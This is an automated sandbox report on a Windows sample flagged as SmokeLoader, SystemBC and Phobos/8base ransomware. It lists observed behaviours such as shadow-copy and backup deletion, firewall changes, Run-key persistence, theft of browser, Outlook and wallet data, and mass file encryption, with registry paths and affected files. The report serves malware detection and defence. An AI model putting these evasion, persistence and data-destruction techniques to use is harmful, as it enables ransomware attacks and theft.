Malware Analysis Report

2024-11-16 12:14

Sample ID 230625-mffepseg21
Target e142f4e8eb3fb4323fb377138.exe
SHA256 e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0
Tags
smokeloader backdoor trojan phobos systembc agilenet collection evasion persistence ransomware spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0

Threat Level: Known bad

The file e142f4e8eb3fb4323fb377138.exe was found to be: Known bad.

Malicious Activity Summary

smokeloader backdoor trojan phobos systembc agilenet collection evasion persistence ransomware spyware stealer themida

Phobos

SystemBC

SmokeLoader

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Deletes shadow copies

Modifies boot configuration data using bcdedit

Renames multiple (407) files with added filename extension

Deletes backup catalog

Downloads MZ/PE file

Blocklisted process makes network request

Modifies Windows Firewall

Executes dropped EXE

Checks computer location settings

Checks BIOS information in registry

Themida packer

Obfuscated with Agile.Net obfuscator

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Accesses Microsoft Outlook profiles

Checks whether UAC is enabled

Drops desktop.ini file(s)

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Program crash

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

outlook_win_path

outlook_office_path

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-25 10:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-25 10:24

Reported

2023-06-25 10:26

Platform

win7-20230621-en

Max time kernel

150s

Max time network

30s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2028 set thread context of 1304 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"

Network

N/A

Files

memory/2028-54-0x00000000001C0000-0x00000000001D5000-memory.dmp

memory/1304-55-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1304-56-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2028-57-0x0000000000260000-0x0000000000269000-memory.dmp

memory/1304-58-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1264-59-0x00000000025D0000-0x00000000025E6000-memory.dmp

memory/1304-60-0x0000000000400000-0x0000000000409000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-25 10:24

Reported

2023-06-25 10:26

Platform

win10v2004-20230621-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"

Signatures

Phobos

ransomware phobos

SmokeLoader

trojan backdoor smokeloader

SystemBC

trojan systembc

Deletes shadow copies

ransomware

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (407) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sv.bat.exe N/A

Drops startup file

Description Indicator Process Target
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\EA96.exe C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe" C:\Users\Admin\AppData\Local\FallbackBuffer\tzvkgtxv\PublicKey.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EA96 = "C:\\Users\\Admin\\AppData\\Local\\EA96.exe" C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EA96 = "C:\\Users\\Admin\\AppData\\Local\\EA96.exe" C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe" C:\Users\Admin\AppData\Local\Temp\D5D3.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageLargeTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-24_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Search.api.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ui-strings.js C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\Entities C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\th_get.svg C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\vccorlib140.dll C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\InstallRedo.jtx C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_duplicate_plugin.dll.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-72_contrast-white.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vsto.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.contrast-white_targetsize-96.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSplashLogo.scale-250.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-white\WideTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Entities C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\FrequentOfficeUpdateSchedule.xml C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-80_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\SmallTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcDemoR_BypassTrial365-ppd.xrm-ms.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\GrooveIntlResource.dll.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-16_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_shared.gif.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoDev.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_K_COL.HXK C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses_selected.svg C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\ui-strings.js C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial2-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\VideoLAN\VLC\skins\winamp2.xml.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.bg-bg.dll.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\ui-strings.js.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main.css C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adobe_logo.png.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WORD_WHATSNEW.XML C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-36_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\as80.xsl.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libmft_plugin.dll C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\PointerIndicatorPixelShader.cso C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-private-l1-1-0.dll.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL022.XML C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\MedTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example2.Diagnostics\1.0.1\Example2.Diagnostics.psd1 C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Exchange.WebServices.dll.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\trdtv2r41.xsl.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-48_contrast-black.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up-pressed.gif C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Google.scale-250.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-pl.xrm-ms.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_sv.dll C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\eml.scale-48.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\ui-strings.js.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\EnsoUI\id_arrow_black.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\Icons\icon_play_prs.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\EA96.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
